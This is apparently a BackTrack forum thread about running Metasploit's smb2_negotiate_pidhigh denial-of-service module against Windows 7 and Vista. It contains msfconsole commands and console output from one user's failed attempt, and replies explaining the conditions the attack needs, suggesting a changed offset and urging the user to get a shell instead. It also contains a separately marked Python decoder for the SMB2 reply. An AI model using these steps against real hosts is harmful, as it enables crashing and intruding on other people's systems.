Thread: Metasploit latest video_smb2_negotiate_pidhigh_windows 7(dos) 4 X Security Team

  1. #1
    Just burned his ISO
    Join Date
    Jun 2007
    Posts
    11

    Exploit code for a remote reboot flaw in Microsoft’s implementation of the SMB2 protocol has been posted on the internet, exposing users of Windows 7 and Windows Vista to the teardrop attacks that used to be popular on Windows 3.1 and Windows 95.

    Home Page:

    4xsecurityteam(dot)blogspot(dot)com

    4xunderground(dot)blogspot(dot)com

    vimeo.com/channels/4xsecurityteam

    thanks

  2. #2
    Just burned his ISO
    Join Date
    Oct 2009
    Posts
    1

    Hi guys, I have a question. I'm testing this auxiliary, but it isn't working for me: my machine doesn't reboot, and the console just shows this. I didn't try it on one of my machines, I tested it on 3, and that's what happens:

    Targeting host 192.168.1.6:445...
    [-] Auxiliary failed: Rex::ConnectionTimeout The connection timed out (192.168.1.6:445).
    Sending request and waiting for a reply...
    msf > use auxiliary/dos/windows/smb/smb2_negotiate_pidhigh
    msf auxiliary(smb2_negotiate_pidhigh) > set RHOST 192.168.1.3
    RHOST => 192.168.1.3
    msf auxiliary(smb2_negotiate_pidhigh) > set RPORT 445
    RPORT => 445
    msf auxiliary(smb2_negotiate_pidhigh) > run
    [*] Response received: "\x00\x00\x00\x9E\xFESMB@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00A\x00\x01\x00\x02\x02\x00\x00\x8Dm\x8E\xEEc#}B\xA3b\x1D\x03\xB4\xC4%\x99\x01\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x8B\x06_\xC6\rX\xCA\x01\xFBX+[\xAEW\xCA\x01\x80\x00\x1E\x00 LM `\x1C\x06\x06+\x06\x01\x05\x05\x02\xA0\x120\x10\xA0\x0E0\f\x06\n+\x06\x01\x04\x01\x827\x02\x02\n"
    [*] Auxiliary module execution completed

    Could anybody give me an idea of what's going on??

    Hi guys, I see that there's no thread about this particular question. I tried to execute and run the auxiliary smb2_negotiate_pidhigh on my other 3 computers in my network, but it doesn't execute, because my machines don't reboot. I have the ports that are supposed to be open for this to be done. Here is the code of what happens:


    Targeting host 192.168.1.6:445...
    [-] Auxiliary failed: Rex::ConnectionTimeout The connection timed out (192.168.1.6:445).
    Sending request and waiting for a reply...
    msf > use auxiliary/dos/windows/smb/smb2_negotiate_pidhigh
    msf auxiliary(smb2_negotiate_pidhigh) > set RHOST 192.168.1.3
    RHOST => 192.168.1.3
    msf auxiliary(smb2_negotiate_pidhigh) > set RPORT 445
    RPORT => 445
    msf auxiliary(smb2_negotiate_pidhigh) > run
    [*] Response received: "\x00\x00\x00\x9E\xFESMB@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00A\x00\x01\x00\x02\x02\x00\x00\x8Dm\x8E\xEEc#}B\xA3b\x1D\x03\xB4\xC4%\x99\x01\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x8B\x06_\xC6\rX\xCA\x01\xFBX+[\xAEW\xCA\x01\x80\x00\x1E\x00 LM `\x1C\x06\x06+\x06\x01\x05\x05\x02\xA0\x120\x10\xA0\x0E0\f\x06\n+\x06\x01\x04\x01\x827\x02\x02\n"
    [*] Auxiliary module execution completed

    Hope that someone has an idea of what's going on.
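
Added example, not part of the thread and not Metasploit code: the reply pasted in post #2 is an ordinary SMB2 NEGOTIATE response, and decoding it shows what the host actually answered. The field layout follows the published SMB2 header and NEGOTIATE response structures; the function names are made up for this example.

```python
import struct
from datetime import datetime, timedelta

# Reply printed in post #2, with the forum's line-wrap spaces removed and the
# run of 44 zero header bytes written as a repeat.
RESPONSE = (
    b"\x00\x00\x00\x9E"                      # NetBIOS session header (length 0x9E)
    b"\xFESMB@\x00\x00\x00\x00\x00\x00\x00"  # ProtocolId, StructureSize, CreditCharge, Status
    b"\x00\x00\x01\x00\x01\x00\x00\x00"      # Command, Credits, Flags
    + b"\x00" * 44 +                         # NextCommand through Signature
    b"A\x00\x01\x00\x02\x02\x00\x00"         # StructureSize, SecurityMode, Dialect, Reserved
    b"\x8Dm\x8E\xEEc#}B\xA3b\x1D\x03\xB4\xC4%\x99"  # ServerGuid
    b"\x01\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00"  # Caps, max sizes
    b"\x8B\x06_\xC6\rX\xCA\x01\xFBX+[\xAEW\xCA\x01"  # SystemTime, ServerStartTime
    b"\x80\x00\x1E\x00 LM "                  # SecurityBuffer offset/length, Reserved2
    b"`\x1C\x06\x06+\x06\x01\x05\x05\x02\xA0\x120\x10\xA0\x0E0\f\x06\n"
    b"+\x06\x01\x04\x01\x827\x02\x02\n"      # GSS-API security blob
)

def filetime(ft):
    """Convert a Windows FILETIME (100 ns ticks since 1601-01-01) to datetime."""
    return datetime(1601, 1, 1) + timedelta(microseconds=ft // 10)

def parse_negotiate_response(pkt):
    """Decode the NetBIOS frame, SMB2 header and NEGOTIATE response body."""
    length = int.from_bytes(pkt[1:4], "big")
    smb = pkt[4:4 + length]
    if len(smb) != length or smb[:4] != b"\xfeSMB":
        raise ValueError("truncated frame or not an SMB2 message")
    hdr_size, _, status, command, _, flags = struct.unpack_from("<HHIHHI", smb, 4)
    (_, sec_mode, dialect, _, _guid, _caps, _mt, _mr, _mw, now, boot,
     sec_off, sec_len) = struct.unpack_from("<HHHH16sIIIIQQHH", smb, hdr_size)
    blob = smb[sec_off:sec_off + sec_len]    # offset counts from the SMB2 header
    return {
        "status": status,                          # 0 = STATUS_SUCCESS
        "command": command,                        # 0 = NEGOTIATE
        "is_response": bool(flags & 0x1),          # SMB2_FLAGS_SERVER_TO_REDIR
        "dialect": dialect,                        # 0x0202 = SMB 2.0.2
        "signing_enabled": bool(sec_mode & 0x1),
        "server_time": filetime(now),
        "uptime_seconds": (now - boot) // 10_000_000,
        "spnego": blob[2:10] == bytes.fromhex("06062b0601050502"),  # OID 1.3.6.1.5.5.2
    }

if __name__ == "__main__":
    for key, value in parse_negotiate_response(RESPONSE).items():
        print(f"{key:16} {value}")
```

For this capture the decoder reports status 0, dialect 0x0202 and a start time roughly eleven hours before the server's own clock, so the host answered the negotiate normally and had not restarted.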

  3. #3
    Super Moderator Archangel-Amael
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    8,012

    Edit your posts using the Edit button located at the bottom right hand side of said post. Re-read the rules that you agreed to when you signed up.
    This is your one and only warning.

    Furthermore there is no reason to make multiple posts on the same subject.
    To be successful here you should read all of the following.
    ForumRules
    ForumFAQ
    If you are new to Back|Track
    Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.

  4. #4
    Member imported_vvpalin
    Join Date
    Apr 2009
    Posts
    442

    post above yours makes my eyes hurt lol

    It's not enough just to have the port open btw .. you have to be sharing something & it needs to be unpatched.

    If you meet both of those conditions you could either try the other dos, or possibly change the offset.

    Regardless tho why pull a dos when you can pull a shell
    Using backtrack for the first time is like being 10 years old again with the keys to a Ferrari.
